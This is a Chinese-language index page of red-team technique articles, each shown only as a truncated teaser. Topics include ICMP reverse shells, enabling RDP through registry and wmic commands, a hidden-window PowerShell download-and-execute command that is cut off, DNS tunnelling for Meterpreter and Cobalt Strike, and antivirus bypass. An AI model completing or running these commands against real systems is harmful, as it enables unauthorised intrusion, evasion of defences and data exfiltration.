红队技术
-
ICMP隧道反弹shell
主机是可以使用ping 所以支持icmp协议出网 Icmpsh 这个攻击可以用icmp反弹shell 项目地址 https://github.com/inquisb/icmpsh …
-
一条命令修改windows注册表
以修改windows远程桌面端口3389为3000为例子。 修改注册表,命令如下: REG ADD “HKEY_LOCAL_MACHINE\System\Current…
-
xp/2003开关3389指令
开启3389: @echo offtitle 开启3389clsrem 开启3389reg add “HKEY_LOCAL_MACHINE\SYSTEM\Current…
-
命令行强制开启3389服务支持server2008 server2012和2003
1.C:\Windows\System32\wbem\wmic /namespace:\root\cimv2\terminalservices path win32_termina…
-
net use \\192.168.54.145 /user:administrator “12345qwert”无法连接,错误码1326
1.在远程机的”控制面板-文件夹选项-查看-简单的文件共享”,去掉选取,然后再尝试连接 2.控制面板\所有控制面板项\管理工具 下–》本地安全策…
-
powershell 远程下载并执行
远程下载文件到本地并执行 cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hid…
-
隔离网络环境下的数据渗漏:Meterpreter DNS隧道技术
对于渗透测试人员来说,Meterpreter是常用的Metasploit环境远程代理,其中内置的多级攻击载荷(payload)非常方便灵活,对管理控制已拿下的远程沦陷机器极为实用。…
-
Cobalt strike走DNS隧道上线
0x01 首先开放CS server段的53端口 只要开放UDP端口就可以了。 0x02 然后配置好dns解析 顺便说一下检测DNS配置是否生效 nslookup ns1.bhst…
-
cmd下怎么获取特定文件的绝对路径 ?
windows下获取目录及子目录文件名称的命令 实例:列出当前目录及子目录下的所有文件(/S/B),不包括文件夹(/A:A) dir /S/B /A:A 以下内容只供参考 DI…
-
【原创】红队攻击模块bypassAv使用
1.简单介绍 本网站所有模块和功能由暗月本人独自开发,这需要不少时间来完善,目前其他模块在增加。 2.byassAv的使用 本模块可以过掉一些杀软 如某36AV 某管家 等杀软。 …